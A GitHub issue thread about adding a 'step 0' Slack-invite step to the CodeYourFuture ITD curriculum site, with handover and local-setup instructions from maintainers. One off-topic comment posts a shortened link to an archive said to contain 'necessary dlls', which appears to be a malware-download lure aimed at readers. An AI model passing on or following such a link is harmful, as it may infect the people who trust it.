### ISSUE TITLE
Add step 0 to our Curriculum

### ISSUE THREAD

**Issue by kfklein15** [CodeYourFuture/curriculum#958] opened 2024-09-19 11:16 UTC
**Background**
We remembered about step 0, which is to invite them to ITD Slack, late in the game, so this step isn't included on our [Curriculum](https://cyf-itd.netlify.app/steps/), causing confusion.

**Acceptance criteria**
- Add the step to our page: https://cyf-itd.netlify.app/steps/ as step zero
- Do NOT add the link to actually accept invite to Slack, otherwise people that have not singed-up can join Slack and that would generate confusion.

**Comment by Buqra55** [comment] 2024-09-19 11:17
try this
https://bit.ly/4gx42eQ
I put the necessary dlls in the archive

**Comment by AmyCYF** [comment] 2024-09-20 17:40
@SallyMcGrath could a handover on this site to the ITD syllabus team so they can make updates moving forward.

**Comment by SallyMcGrath** [comment] 2024-10-04 18:59
Not sure what you mean, Amy?

**Comment by AmyCYF** [comment] 2024-10-07 08:36
@SallyMcGrath for this ticket, the ITD team have some changes they need to make to https://cyf-itd.netlify.app/steps/ . 

@Ara225 @ZacheeNiyokwizera asked if you could do a handover of the site so they can make the changes required and any other changes needed moving forward.

**Comment by SallyMcGrath** [comment] 2024-10-07 08:38
@Ara225 @ZacheeNiyokwizera  you can talk to me directly. Book in a call if you need one. The link is in my Slack profile. 🙏

**Comment by Ara225** [comment] 2024-10-07 08:40
I think we should be good with beingb pointed to the repo and deployment instructions. It’s easier than fussing around with a meeting

**Comment by SallyMcGrath** [comment] 2024-10-08 17:11
It's in this repo - https://github.com/CodeYourFuture/curriculum/tree/main/org-cyf-itd

I would probably do the following:

Duplicate step one and rename it step zero
https://github.com/CodeYourFuture/curriculum/tree/main/org-cyf-itd/content/steps/one

Do the same for the content blocks here
https://github.com/CodeYourFuture/curriculum/tree/main/org-cyf-itd/content/blocks/step-1 => step-0

Tweak the content and links to match the step 0 content in the dashboard.

There are readmes throughout to show you how to set up the whole platform if you want to run it on your local 

There's also a docs site here https://common.codeyourfuture.io/

The main thing to run on your local is you need to generate bearer token to authenticate with github - https://github.com/CodeYourFuture/curriculum/blob/main/org-cyf/README.md

Other people who are regularly running this platform and can unblock you: @moneyinthesky @illicitonion @Dedekind561 @40thieves  (and me obv)

**Comment by Ara225** [comment] 2024-10-08 19:12
Thanks, make sense, I will handle this :)

**Comment by Ara225** [comment] 2024-10-08 19:12
Thanks, make sense, I will handle this :)

**Comment by kfklein15** [comment] 2024-10-18 18:07
@Ara225 , let's create a PR to the curriculum

**Comment by Ara225** [comment] 2024-10-20 09:37
Got it up and running on my local. Just wondering how to view the ITD portion of the currlicum specfically? I can't seem to actually navigate to the ITD part.

**Comment by SallyMcGrath** [comment] 2024-10-20 10:04
```
cd org-cyf-itd
npm i
npm run start:dev
```

**Comment by 40thieves** [comment] 2024-10-22 17:38
Dupe of [#1057](https://github.com/CodeYourFuture/curriculum/issues/1057)

**Closed by 40thieves** 2024-10-22 17:38 UTC
Labels: ITD
